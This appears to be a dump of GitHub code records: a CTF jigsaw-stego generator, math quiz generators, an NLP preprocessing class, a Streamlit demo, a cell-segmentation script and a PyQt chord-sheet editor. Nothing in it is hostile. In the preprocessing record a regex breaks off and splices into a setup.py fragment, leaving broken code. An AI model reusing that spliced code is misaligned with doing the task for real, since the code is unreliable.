문제풀이/자료구조/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37857955734","text":"from PIL import Image, ImageDraw\nimport numpy as np\nfrom random import randrange\nimport uuid\n\nclass Board:\n 
WIDTH = 20\n HEIGHT = 20\n\n def __init__(self, image_path):\n self.image = Image.open(image_path)\n self.pix = np.array(self.image)\n self.pixel_height, self.pixel_width, _ = self.pix.shape\n h, w, _ = self.pix.shape\n if w % self.WIDTH != 0 or h % self.HEIGHT != 0:\n raise Exception(\"Image dimensions are not a multiple of board dimensions\")\n\n self.piece_width = w // self.WIDTH\n self.piece_height = h // self.HEIGHT\n Piece.resize_handle((self.piece_width//2, self.piece_height//2))\n self.board = self.init_board()\n\n def init_board(self):\n board = []\n\n for i in range(self.WIDTH):\n row = []\n for j in range(self.HEIGHT):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n region = self.image.crop((origin_x, origin_y, origin_x+self.piece_width, origin_y+self.piece_height))\n row.append(Piece(region))\n board.append(row)\n\n for i, row in enumerate(board):\n for j, piece in enumerate(row):\n if j < len(row) - 1:\n right = randrange(1,3)\n piece.set_side(1, right)\n row[j+1].set_opposite_side(1, right)\n\n if i < len(board)-1:\n down = randrange(1,3)\n piece.set_side(2, down)\n board[i+1][j].set_opposite_side(2, down)\n return board\n\n def generate_image(self):\n im = Image.new(\"RGBA\", (self.pixel_width, self.pixel_height))\n draw = ImageDraw.Draw(im)\n for i, row in enumerate(self.board):\n for j, piece in enumerate(row):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n region = piece.image_region\n im.paste(region, (origin_x, origin_y))\n draw.rectangle((origin_x, origin_y, origin_x+self.piece_width, origin_y+self.piece_height), outline=(255,0 ,0))\n\n im.save(\"board.png\")\n\n def generate_pieces(self):\n for i, row in enumerate(self.board):\n for j, piece in enumerate(row):\n origin_x = j * self.piece_width\n origin_y = i * self.piece_height\n mask = piece.generate_mask()\n im = Image.new(\"RGBA\", mask.size)\n w,h = mask.size\n left_offset = (w - self.piece_width) // 2\n top_offset = (h - self.piece_height) // 2\n mask_origin_x = origin_x - left_offset\n mask_origin_y = origin_y - top_offset\n region = self.image.crop((mask_origin_x, mask_origin_y, mask_origin_x + w, mask_origin_y + h))\n im.paste(region, mask=mask)\n random_name = uuid.uuid4().hex\n im.save(f\"pieces/{random_name}.png\")\n\n\n\nclass Piece:\n SIDE_TYPES = {\n \"FLAT\": 0,\n \"FEMALE\": 1,\n \"MALE\": 2\n }\n HANDLE_MASK = Image.open(\"mask.png\") # TODO resize this dude in proportion to piece size\n HANDLE_MASK_90 = HANDLE_MASK.rotate(90, expand=1)\n HANDLE_MASK_180 = HANDLE_MASK.rotate(180, expand=1)\n HANDLE_MASK_270 = HANDLE_MASK.rotate(270, expand=1)\n\n HANDLE_MASK_2 = Image.open(\"mask2.png\")\n HANDLE_MASK_2_90 = HANDLE_MASK_2.rotate(90, expand=1)\n HANDLE_MASK_2_180 = HANDLE_MASK_2.rotate(180, expand=1)\n HANDLE_MASK_2_270 = HANDLE_MASK_2.rotate(270, expand=1)\n\n def __init__(self, image_region):\n self.sides = [self.SIDE_TYPES[\"FLAT\"] for _ in range(4)] # top-right-down-left\n self.image_region = image_region\n\n @staticmethod\n def resize_handle(size):\n Piece.HANDLE_MASK.thumbnail(size)\n Piece.HANDLE_MASK_90 = Piece.HANDLE_MASK.rotate(90, expand=1)\n Piece.HANDLE_MASK_180 = Piece.HANDLE_MASK.rotate(180, expand=1)\n Piece.HANDLE_MASK_270 = Piece.HANDLE_MASK.rotate(270, expand=1)\n\n Piece.HANDLE_MASK_2.thumbnail(size)\n Piece.HANDLE_MASK_2_90 = Piece.HANDLE_MASK_2.rotate(90, expand=1)\n Piece.HANDLE_MASK_2_180 = Piece.HANDLE_MASK_2.rotate(180, expand=1)\n Piece.HANDLE_MASK_2_270 = Piece.HANDLE_MASK_2.rotate(270, expand=1)\n\n def set_side(self, side, 
side_type):\n self.sides[side] = side_type\n\n def set_opposite_side(self, side, side_type):\n side = (side + 2) % 4\n if side_type == self.SIDE_TYPES[\"MALE\"]:\n side_type = self.SIDE_TYPES[\"FEMALE\"]\n elif side_type == self.SIDE_TYPES[\"FEMALE\"]:\n side_type = self.SIDE_TYPES[\"MALE\"]\n\n self.set_side(side, side_type)\n\n def generate_mask(self):\n w,h = self.image_region.size\n handle_width, handle_height = self.HANDLE_MASK.size\n mask_width, mask_height = w+2*handle_width, h+2*handle_width\n left_offset = handle_width\n top_offset = handle_width\n piece_mask = Image.new(\"RGBA\", (mask_width, mask_height))\n draw = ImageDraw.Draw(piece_mask)\n draw.rectangle((left_offset, top_offset, left_offset+w-1, top_offset+h-1), (255,255,255))\n\n if self.sides[0] == self.SIDE_TYPES[\"MALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = 0\n piece_mask.paste(self.HANDLE_MASK_90, (left,top))\n if self.sides[1] == self.SIDE_TYPES[\"MALE\"]:\n top_handle_offset = top_offset + ((h-handle_height) // 2)\n left_handle_offset = left_offset + w\n piece_mask.paste(self.HANDLE_MASK, (left_handle_offset, top_handle_offset))\n if self.sides[2] == self.SIDE_TYPES[\"MALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset + h\n piece_mask.paste(self.HANDLE_MASK_270, (left,top))\n if self.sides[3] == self.SIDE_TYPES[\"MALE\"]:\n left = 0\n top = top_offset + ((h-handle_height) // 2)\n piece_mask.paste(self.HANDLE_MASK_180, (left,top))\n\n if self.sides[0] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset\n piece_mask.paste(self.HANDLE_MASK_2_270, (left,top))\n if self.sides[1] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + w - handle_width\n top = top_offset + ((h-handle_height) // 2)\n piece_mask.paste(self.HANDLE_MASK_2_180, (left,top))\n if self.sides[2] == self.SIDE_TYPES[\"FEMALE\"]:\n left = left_offset + (w-handle_height) // 2\n top = top_offset + h - handle_width\n piece_mask.paste(self.HANDLE_MASK_2_90, (left,top))\n if self.sides[3] == self.SIDE_TYPES[\"FEMALE\"]:\n top_handle_offset = top_offset + ((h-handle_height) // 2)\n left_handle_offset = left_offset\n piece_mask.paste(self.HANDLE_MASK_2, (left_handle_offset, top_handle_offset))\n return piece_mask\n\n\nif __name__ == \"__main__\":\n board = Board(\"stego.png\")\n board.generate_pieces()\n","repo_name":"UnitedCTF/UnitedCTF-2019","sub_path":"challenges/steg/puzzle_hero/generate_pieces.py","file_name":"generate_pieces.py","file_ext":"py","file_size_in_byte":7082,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"20649815909","text":"# question_strategies/addition.py\n# In-built imports\nfrom typing import Type\nimport math\n\n# Third-party imports\n\n# Sys-Paths for Relative Imports\nimport sys\nfrom os.path import dirname, abspath\npackage_path = dirname(dirname(abspath(__file__)))\nif(package_path not in sys.path): sys.path.insert(0, package_path)\n\n# Relative imports\nfrom question_strategies import question\n\nclass PermuataionQuestionType1(question.QuestionType):\n Q_TYPE = \"PermuataionType1\"\n INIT_VARIABLES= {\n \"number_of_nums\": \"int\"\n }\n def __init__(self, number_generator_cls:question.numGenType) -> None:\n super().__init__()\n self.number_generator_obj = number_generator_cls\n\n def generate_question(self) -> question.Question:\n n ,r = sorted([self.number_generator_obj.number() for i in range(2)], reverse=True)\n p = math.factorial(n) / math.factorial(n - r)\n print(p)\n 
question_string = f\"Find the number of permutaions when n={n} and r={r} repeatation not allowed\"\n return question.Question(question_string, p, self.Q_TYPE)\n\nclass PermuataionQuestionType2(question.QuestionType):\n Q_TYPE = \"PermuataionType2\"\n INIT_VARIABLES= {\n \"number_of_nums\": \"int\"\n }\n def __init__(self, number_generator_cls:question.numGenType) -> None:\n super().__init__()\n self.number_generator_obj = number_generator_cls\n\n def generate_question(self) -> question.Question:\n n ,r = sorted([self.number_generator_obj.number() for i in range(2)], reverse=True)\n p = n**r\n question_string = f\"Find the number of permutaions when n={n} and r={r} repeatation allowed\"\n return question.Question(question_string, p, self.Q_TYPE)\n\nTYPE_LOOKUP:dict[str, Type[question.QuestionType]] = {\n \"without repeatation\": PermuataionQuestionType1, # without repeatation\n \"with repeatation\": PermuataionQuestionType2 # with repeatation\n}\n\n","repo_name":"jagrutgala/SEM-VI-Project","sub_path":"math_gen_api/question_strategies/permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994600809","text":"from aurora.nouns.instruments import Violin\nfrom aurora.nouns.performers.Performer import Performer\n\n\nclass Violinist(Performer):\n '''Model of a violinist as a performer.'''\n\n def __init__(self, name, instruments = []):\n primary = [Violin()]\n primary.extend(instruments)\n Performer.__init__(self, name, primary)\n","repo_name":"josiah-wolf-oberholtzer/aurora","sub_path":"aurora/nouns/performers/Violinist/Violinist.py","file_name":"Violinist.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23781312229","text":"import re\nimport string\nimport numpy as np\nimport pandas as pd\n\n\nclass Pre_Processing_data:\n\n def read_textfile(self, file):\n with open(file, encoding='utf8') as in_file:\n stripped = (line.strip() for line in in_file)\n tweets_ = {}\n for line in stripped:\n lines = [splits for splits in line.split(\"\\t\") if splits != \"\"]\n tweets_[lines[1]] = float(lines[0])\n df = pd.DataFrame(tweets_.items(), columns=['tweets', 'sentiment'])\n df = df.sample(frac=1).reset_index(drop=True)\n return df\n\n def cleantext(self, df, text_column=None, remove_stopwords=True, remove_punchuation=True):\n df[text_column] = df[text_column].str.lower()\n stopwords = [\"a\", \"about\", \"above\", \"after\", \"again\", \"against\",\n \"all\", \"am\", \"an\", \"and\", \"any\", \"are\",\n \"as\", \"at\", \"be\", \"because\",\n \"been\", \"before\", \"being\", \"below\",\n \"between\", \"both\", \"but\", \"by\", \"could\",\n \"did\", \"do\", \"does\", \"doing\", \"down\", \"during\",\n \"each\", \"few\", \"for\", \"from\", \"further\",\n \"had\", \"has\", \"have\", \"having\", \"he\",\n \"he'd\", \"he'll\", \"he'stoch\", \"her\", \"here\",\n \"here'stoch\", \"hers\", \"herself\", \"him\",\n \"himself\", \"his\", \"how\", \"how'stoch\", \"i\",\n \"i'd\", \"i'll\", \"i'm\", \"i've\",\n \"if\", \"in\", \"into\",\n \"is\", \"it\", \"it'stoch\", \"its\",\n \"itself\", \"let'stoch\", \"me\", \"more\",\n \"most\", \"my\", \"myself\", \"nor\", \"of\",\n \"on\", \"once\", \"only\", \"or\",\n \"other\", \"ought\", \"our\", \"ours\",\n \"ourselves\", \"out\", \"over\", \"own\", \"same\",\n \"she\", \"she'd\", \"she'll\", \"she'stoch\", \"should\",\n \"so\", 
\"some\", \"such\", \"than\", \"that\",\n \"that'stoch\", \"the\", \"their\", \"theirs\", \"them\",\n \"themselves\", \"then\", \"there\", \"there'stoch\",\n \"these\", \"they\", \"they'd\", \"they'll\",\n \"they're\", \"they've\", \"this\", \"those\",\n \"through\", \"to\", \"too\", \"under\", \"until\", \"up\",\n \"very\", \"was\", \"we\", \"we'd\", \"we'll\",\n \"we're\", \"we've\", \"were\", \"what\",\n \"what'stoch\", \"when\", \"when'stoch\",\n \"where\", \"where'stoch\",\n \"which\", \"while\", \"who\", \"who'stoch\",\n \"whom\", \"why\", \"why'stoch\", \"with\",\n \"would\", \"you\", \"you'd\", \"you'll\",\n \"you're\", \"you've\",\n \"your\", \"yours\", \"yourself\", \"yourselves\"]\n\n def remove_stopwords(data, column):\n data[f'{column} without stopwords'] = data[column].apply(\n lambda x: ' '.join([word for word in x.split() if word not in stopwords]))\n return data\n\n def remove_tags(string):\n result = re.sub('<*>', '', string)\n return result\n\n # remove html tags and brackets from text\n if remove_stopwords:\n without_stopwords = remove_stopwords(df, text_column)\n without_stopwords[f'clean_{text_column}'] = without_stopwords[\n f'{text_column} without stopwords'].apply(\n lambda cw: remove_tags(cw))\n if remove_punchuation:\n without_stopwords[f'clean_{text_column}'] = without_stopwords[f'clean_{text_column}'].str.replace(\n '[{}]'.format(string.punctuation), ' ', regex=True)\n\n X = without_stopwords[f'clean_{text_column}'].to_numpy()\n\n return X\n\n def sent_tokeniser(self, x):\n sentences = re.split(r'(?=3.6\",\n)\n","repo_name":"felixbrunner/euraculus","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19824876258","text":"import streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nst.title('Uber pickups in NYC')\r\n\r\nDATE_COLUMN = 'date/time'\r\nDATA_URL = ('https://s3-us-west-2.amazonaws.com/''streamlit-demo-data/uber-raw-data-sep14.csv.gz')\r\n\r\n# caches data that is loaded into dataframe\r\n@st.cache_data\r\ndef load_data(nrows):\r\n data = pd.read_csv(DATA_URL, nrows = nrows)\r\n lowercase = lambda x: str(x).lower()\r\n data.rename(lowercase, axis = 'columns', inplace = True)\r\n data[DATE_COLUMN] = pd.to_datetime(data[DATE_COLUMN])\r\n return data\r\n\r\n\r\n# Creates text box informing reader that the data is loading\r\ndata_load_state = st.text('Loading data...')\r\n\r\n# Loads 10,000 rows of data\r\ndata = load_data(10000)\r\n\r\n# Informs reader that data has loaded\r\n# st.cache_data allows for immediate data loadtime, good for long-running computations\r\ndata_load_state.text(\"Done! 
(using st.cache_data)\")\r\n\r\n# Checkbox button to toggle raw data\r\nif st.checkbox('Show raw data'):\r\n st.subheader('Raw data')\r\n st.write(data)\r\n\r\n\r\n# Creates a histogram of pickup times sorted by hour\r\nst.subheader('Number of pickups by hour')\r\n\r\nhist_values = np.histogram (\r\n data[DATE_COLUMN].dt.hour, bins = 24, range = (0,24))[0]\r\n\r\nst.bar_chart(hist_values)\r\n\r\n# Shows pickups concentration at 5pm (busiest time) in New York as a histogram\r\nhour_to_filter = st.slider('hour', 0, 23, 17) # min: 0h, max: 23h, default: 17h\r\nfiltered_data = data[data[DATE_COLUMN].dt.hour == hour_to_filter]\r\nst.subheader(f'Map of all pickups at {hour_to_filter}:00')\r\nst.map(filtered_data)\r\n","repo_name":"amoore2829/StreamLit-Learning","sub_path":"Practice/StreamLit_Docs_App/uber_pickups.py","file_name":"uber_pickups.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7860600966","text":"import argparse\r\nimport json\r\nimport numpy as np\r\nimport random\r\nimport torch\r\nimport warnings\r\n\r\nfrom pathlib import Path\r\n\r\nfrom segmentation.inference.inference import inference_2d_ctc, inference_3d_ctc\r\nfrom segmentation.training.cell_segmentation_dataset import CellSegDataset\r\nfrom segmentation.training.autoencoder_dataset import AutoEncoderDataset\r\nfrom segmentation.training.create_training_sets import create_ctc_training_sets, create_sim_training_sets\r\nfrom segmentation.training.mytransforms import augmentors\r\nfrom segmentation.training.training import train, train_auto\r\nfrom segmentation.utils import utils, unets\r\nfrom segmentation.utils.metrics import ctc_metrics, count_det_errors\r\n\r\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\r\n\r\ndef main():\r\n\r\n random.seed()\r\n np.random.seed()\r\n\r\n # Get arguments\r\n parser = argparse.ArgumentParser(description='Cell Segmentation')\r\n parser.add_argument('--train', '-t', default=False, action='store_true', help='Train new models')\r\n parser.add_argument('--evaluate', '-e', default=False, action='store_true', help='Evaluate models')\r\n parser.add_argument('--inference', '-i', default=False, action='store_true', help='Inference')\r\n parser.add_argument('--save_raw_pred', '-s', default=False, action='store_true', help='Save raw predictions')\r\n parser.add_argument('--cell_type', '-c', default='all', type=str, help='Cell type')\r\n parser.add_argument('--mode', '-m', default='GT', type=str, help='Mode for training')\r\n parser.add_argument('--th_seed', '-th_s', default=0.45, type=float, help='Seed threshold')\r\n parser.add_argument('--th_cell', '-th_c', default=0.08, type=float, help='Cell size threshold')\r\n parser.add_argument('--apply_clahe', '-ac', default=False, action='store_true', help='Apply CLAHE')\r\n parser.add_argument('--n_splitting', '-ns', default=40, type=int, help='Cell number to apply local splitting (only 3D)')\r\n parser.add_argument('--scale', '-sc', default=1.0, type=float, help='Scale for down-/upsampling (inference)')\r\n parser.add_argument('--batch_size', '-bs', default=8, type=int, help='Batch size (inference)')\r\n parser.add_argument('--multi_gpu', '-mgpu', default=True, action='store_true', help='Use multiple GPUs')\r\n parser.add_argument('--artifact_correction', default=False, action='store_true', help='Artifact correction (only for very dense cells, e.g., HSC')\r\n parser.add_argument('--fuse_z_seeds', default=False, action='store_true', 
help='Fuse seeds in z-direction')\r\n parser.add_argument('--cuda', default=False, action='store_true', help='Use CUDA')\r\n\r\n args = parser.parse_args()\r\n\r\n with open(Path.cwd() / 'cell_segmentation_train_settings.json') as f:\r\n settings = json.load(f)\r\n\r\n paths = {\r\n \"cell_types\":\r\n [\r\n \"cell\"\r\n ],\r\n \"path_ctc_metric\": \"EvaluationSoftware/\",\r\n \"path_data\": \"data/\",\r\n \"path_results\": \"results/\"\r\n }\r\n\r\n # Paths\r\n path_datasets = Path(paths['path_data'])\r\n path_results = Path(paths['path_results'])\r\n if path_results == '':\r\n path_results = path_datasets\r\n path_models = path_results / 'segmentation_models'\r\n path_best_models = path_datasets / 'Models' / 'Model'\r\n path_train_data = path_results / 'training_sets'\r\n path_ctc_metric = Path(paths['path_ctc_metric'])\r\n if args.cell_type == 'all':\r\n cell_types = paths['cell_types']\r\n else:\r\n cell_types = [args.cell_type]\r\n\r\n # Set device for using CPU or GPU\r\n if args.cuda:\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n else:\r\n device = \"cpu\"\r\n print('using ', device)\r\n if str(device) == 'cuda':\r\n torch.backends.cudnn.benchmark = True\r\n if args.multi_gpu:\r\n num_gpus = torch.cuda.device_count()\r\n else:\r\n num_gpus = 1\r\n print('multi gpus ', num_gpus)\r\n\r\n if args.train: # Train model from scratch\r\n\r\n # Make directory for the trained models\r\n path_models.mkdir(exist_ok=True)\r\n\r\n print('Create training sets for all cell types ...')\r\n create_ctc_training_sets(path_data=path_datasets,\r\n path_train_sets=path_train_data,\r\n cell_types=paths['cell_types'])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n main()","repo_name":"avivshalem/Cell-Insights","sub_path":"Segmentation_Pipeline/CreateDatasetBeforeTraining.py","file_name":"CreateDatasetBeforeTraining.py","file_ext":"py","file_size_in_byte":4402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9277814007","text":"import torch\nfrom torch import nn\n\n\nclass SuperCov(nn.Module):\n \"\"\"SuperCov Network\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.relu = nn.ReLU(inplace=True)\n self.leaky_relu = nn.LeakyReLU(inplace=True)\n self.sigmoid = nn.Sigmoid()\n c1, c2, c3, c4 = 16, 16, 32, 32\n\n self.conv1a = nn.Conv2d(1, c1, kernel_size=3, stride=1, padding=1)\n self.conv1b = nn.Conv2d(c1, c1, kernel_size=3, stride=1, padding=1)\n self.conv2a = nn.Conv2d(c1, c2, kernel_size=3, stride=1, padding=1)\n self.conv2b = nn.Conv2d(c2, c2, kernel_size=3, stride=1, padding=1)\n self.conv3a = nn.Conv2d(c2, c3, kernel_size=3, stride=1, padding=1)\n self.conv3b = nn.Conv2d(c3, c3, kernel_size=3, stride=1, padding=1)\n\n self.conv4a = nn.Conv2d(c3, c4, kernel_size=3, stride=1, padding=1)\n self.conv4b = nn.Conv2d(c4, 3, kernel_size=1, stride=1, padding=0)\n\n def forward(self, data):\n \"\"\"Compute keypoints, scores, descriptors for image\"\"\"\n # Shared Encoder\n x = self.relu(self.conv1a(data))\n x = self.relu(self.conv1b(x))\n x = self.relu(self.conv2a(x))\n x = self.relu(self.conv3a(x))\n\n # Compute the dense keypoint scores\n x = self.relu(self.conv4a(x))\n x = self.conv4b(x)\n\n return x\n","repo_name":"DominikMuhle/dnls_covs","sub_path":"scripts/covpred/model/superpoint_architecture.py","file_name":"superpoint_architecture.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} 
+{"seq_id":"17924544591","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 29 00:02:24 2019\n\n@author: ivan\n\"\"\"\n\nimport sys\nimport fitz\nimport io\nimport subprocess\nimport os\nimport time\nfrom copy import copy\n\nfrom PyQt5.QtWidgets import QApplication, QAction, QLabel, QDialogButtonBox, QDialog, QFileDialog, QMessageBox, QPushButton, QLineEdit, QCheckBox, QSpinBox, QDoubleSpinBox, QTableWidgetItem, QTabWidget, QComboBox, QWidget, QScrollArea, QMainWindow, QShortcut\nfrom PyQt5.QtCore import QFile, QObject, Qt, pyqtSlot, QSettings\nfrom PyQt5.QtGui import QPixmap, QImage, QKeySequence\nfrom PyQt5 import uic\nfrom chordsheet.tableView import ChordTableView, BlockTableView\nfrom chordsheet.comboBox import MComboBox\nfrom chordsheet.pdfViewer import PDFViewer\n\nfrom reportlab.lib.units import mm, cm, inch, pica\nfrom reportlab.lib.pagesizes import A4, A5, LETTER, LEGAL\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom chordsheet.document import Document, Style, Chord, Block, Section\nfrom chordsheet.render import Renderer\nfrom chordsheet.parsers import parseFingering, parseName\n\nimport _version\n\n# set the directory where our files are depending on whether we're running a pyinstaller binary or not\nif getattr(sys, 'frozen', False):\n scriptDir = sys._MEIPASS\nelse:\n scriptDir = os.path.abspath(os.path.dirname(os.path.abspath(__file__)))\n\n# enable automatic high DPI scaling on Windows\nQApplication.setAttribute(Qt.AA_EnableHighDpiScaling, True)\nQApplication.setOrganizationName(\"Ivan Holmes\")\nQApplication.setOrganizationDomain(\"ivanholmes.co.uk\")\nQApplication.setApplicationName(\"Chordsheet\")\nsettings = QSettings()\n\npdfmetrics.registerFont(\n TTFont('FreeSans', os.path.join(scriptDir, 'fonts', 'FreeSans.ttf')))\nif sys.platform == \"darwin\":\n pdfmetrics.registerFont(\n TTFont('HelveticaNeue', 'HelveticaNeue.ttc', subfontIndex=0))\n\n# dictionaries for combo boxes\npageSizeDict = {'A4': A4, 'A5': A5, 'Letter': LETTER, 'Legal': LEGAL}\n# point is 1 because reportlab's native unit is points.\nunitDict = {'mm': mm, 'cm': cm, 'inch': inch, 'point': 1, 'pica': pica}\n\n\nclass DocumentWindow(QMainWindow):\n \"\"\"\n Class for the main window of the application.\n \"\"\"\n\n def __init__(self, doc, style, filename=None):\n \"\"\"\n Initialisation function for the main window of the application.\n\n Arguments:\n doc -- the Document object for the window to use\n style -- the Style object for the window to use\n \"\"\"\n super().__init__()\n\n self.doc = doc\n self.style = style\n self.renderer = Renderer(self.doc, self.style)\n\n self.lastDoc = copy(self.doc)\n self.currentFilePath = filename\n\n self.UIFileLoader(str(os.path.join(scriptDir, 'ui', 'mainwindow.ui')))\n self.UIInitStyle()\n self.updateChordDict()\n self.updateSectionDict()\n self.currentSection = None\n\n self.setCentralWidget(self.window.centralWidget)\n self.setMenuBar(self.window.menuBar)\n self.setWindowTitle(\"Chordsheet\")\n\n if filename:\n try:\n self.openFile(filename)\n except Exception:\n UnreadableMessageBox().exec()\n\n def closeEvent(self, event):\n \"\"\"\n Reimplement the built in closeEvent to allow asking the user to save.\n \"\"\"\n if self.saveWarning():\n self.close()\n\n def UIFileLoader(self, ui_file):\n \"\"\"\n Loads the .ui file for this window and connects the UI elements to their actions.\n \"\"\"\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.window = uic.loadUi(ui_file)\n 
ui_file.close()\n\n # link all the UI elements\n self.window.actionAbout.triggered.connect(self.menuFileAboutAction)\n\n self.window.actionNew.triggered.connect(self.menuFileNewAction)\n self.window.actionOpen.triggered.connect(self.menuFileOpenAction)\n self.window.actionSave.triggered.connect(self.menuFileSaveAction)\n self.window.actionSave_as.triggered.connect(self.menuFileSaveAsAction)\n self.window.actionSave_PDF.triggered.connect(\n self.menuFileSavePDFAction)\n self.window.actionPrint.triggered.connect(self.menuFilePrintAction)\n self.window.actionClose.triggered.connect(self.menuFileCloseAction)\n self.window.actionUndo.triggered.connect(self.menuEditUndoAction)\n self.window.actionRedo.triggered.connect(self.menuEditRedoAction)\n self.window.actionCut.triggered.connect(self.menuEditCutAction)\n self.window.actionCopy.triggered.connect(self.menuEditCopyAction)\n self.window.actionPaste.triggered.connect(self.menuEditPasteAction)\n\n self.window.actionNew.setShortcut(QKeySequence.New)\n self.window.actionOpen.setShortcut(QKeySequence.Open)\n self.window.actionSave.setShortcut(QKeySequence.Save)\n self.window.actionSave_as.setShortcut(QKeySequence.SaveAs)\n self.window.actionSave_PDF.setShortcut(QKeySequence(\"Ctrl+E\"))\n self.window.actionPrint.setShortcut(QKeySequence.Print)\n self.window.actionClose.setShortcut(QKeySequence.Close)\n self.window.actionUndo.setShortcut(QKeySequence.Undo)\n self.window.actionRedo.setShortcut(QKeySequence.Redo)\n self.window.actionCut.setShortcut(QKeySequence.Cut)\n self.window.actionCopy.setShortcut(QKeySequence.Copy)\n self.window.actionPaste.setShortcut(QKeySequence.Paste)\n\n self.window.pageSizeComboBox.currentIndexChanged.connect(\n self.pageSizeAction)\n self.window.documentUnitsComboBox.currentIndexChanged.connect(\n self.unitAction)\n\n self.window.includedFontCheckBox.stateChanged.connect(\n self.includedFontAction)\n\n self.window.generateButton.clicked.connect(self.generateAction)\n\n # update whole document when any tab is selected\n self.window.tabWidget.tabBarClicked.connect(self.tabBarUpdateAction)\n\n self.window.guitarVoicingButton.clicked.connect(\n self.guitarVoicingAction)\n self.window.addChordButton.clicked.connect(self.addChordAction)\n self.window.removeChordButton.clicked.connect(self.removeChordAction)\n self.window.updateChordButton.clicked.connect(self.updateChordAction)\n\n # connecting clicked only works for this combo box because it's my own modified version (MComboBox)\n self.window.blockSectionComboBox.clicked.connect(\n self.blockSectionClickedAction)\n self.window.blockSectionComboBox.currentIndexChanged.connect(\n self.blockSectionChangedAction)\n self.window.addBlockButton.clicked.connect(self.addBlockAction)\n self.window.removeBlockButton.clicked.connect(self.removeBlockAction)\n self.window.updateBlockButton.clicked.connect(self.updateBlockAction)\n\n self.window.addSectionButton.clicked.connect(self.addSectionAction)\n self.window.removeSectionButton.clicked.connect(\n self.removeSectionAction)\n self.window.updateSectionButton.clicked.connect(\n self.updateSectionAction)\n\n self.window.chordTableView.clicked.connect(self.chordClickedAction)\n self.window.sectionTableView.clicked.connect(self.sectionClickedAction)\n self.window.blockTableView.clicked.connect(self.blockClickedAction)\n\n def UIInitDocument(self):\n \"\"\"\n Fills the window's fields with the values from its document.\n \"\"\"\n self.updateTitleBar()\n\n # set all fields to appropriate values from document\n 
self.window.titleLineEdit.setText(self.doc.title)\n self.window.subtitleLineEdit.setText(self.doc.subtitle)\n self.window.composerLineEdit.setText(self.doc.composer)\n self.window.arrangerLineEdit.setText(self.doc.arranger)\n self.window.timeSignatureSpinBox.setValue(self.doc.timeSignature)\n self.window.tempoLineEdit.setText(self.doc.tempo)\n\n self.window.chordTableView.populate(self.doc.chordList)\n self.window.sectionTableView.populate(self.doc.sectionList)\n # populate the block table with the first section, account for a document with no sections\n self.currentSection = self.doc.sectionList[0] if len(\n self.doc.sectionList) else None\n self.window.blockTableView.populate(\n self.currentSection.blockList if self.currentSection else [])\n self.updateSectionDict()\n self.updateChordDict()\n\n def UIInitStyle(self):\n \"\"\"\n Fills the window's fields with the values from its style.\n \"\"\"\n self.window.pageSizeComboBox.addItems(list(pageSizeDict.keys()))\n self.window.pageSizeComboBox.setCurrentText(\n list(pageSizeDict.keys())[0])\n\n self.window.documentUnitsComboBox.addItems(list(unitDict.keys()))\n self.window.documentUnitsComboBox.setCurrentText(\n list(unitDict.keys())[0])\n\n self.window.lineSpacingDoubleSpinBox.setValue(self.style.lineSpacing)\n\n self.window.leftMarginLineEdit.setText(str(self.style.leftMargin))\n self.window.rightMarginLineEdit.setText(str(self.style.rightMargin))\n self.window.topMarginLineEdit.setText(str(self.style.topMargin))\n self.window.bottomMarginLineEdit.setText(str(self.style.bottomMargin))\n\n\n self.window.fontComboBox.setDisabled(True)\n self.window.includedFontCheckBox.setChecked(True)\n\n self.window.beatWidthLineEdit.setText(str(self.style.unitWidth))\n\n def tabBarUpdateAction(self, index):\n self.updateDocument()\n \n def pageSizeAction(self, index):\n self.pageSizeSelected = self.window.pageSizeComboBox.itemText(index)\n\n def unitAction(self, index):\n self.unitSelected = self.window.documentUnitsComboBox.itemText(index)\n\n def includedFontAction(self):\n if self.window.includedFontCheckBox.isChecked():\n self.style.useIncludedFont = True\n else:\n self.style.useIncludedFont = False\n\n def chordClickedAction(self, index):\n # set the controls to the values from the selected chord\n self.window.chordNameLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 0).text())\n self.window.guitarVoicingLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 1).text())\n self.window.pianoVoicingLineEdit.setText(\n self.window.chordTableView.model.item(index.row(), 2).text())\n\n def sectionClickedAction(self, index):\n # set the controls to the values from the selected section\n self.window.sectionNameLineEdit.setText(\n self.window.sectionTableView.model.item(index.row(), 0).text())\n # also set the combo box on the block page to make it flow well\n curSecName = self.window.sectionTableView.model.item(\n index.row(), 0).text()\n if curSecName:\n self.window.blockSectionComboBox.setCurrentText(\n 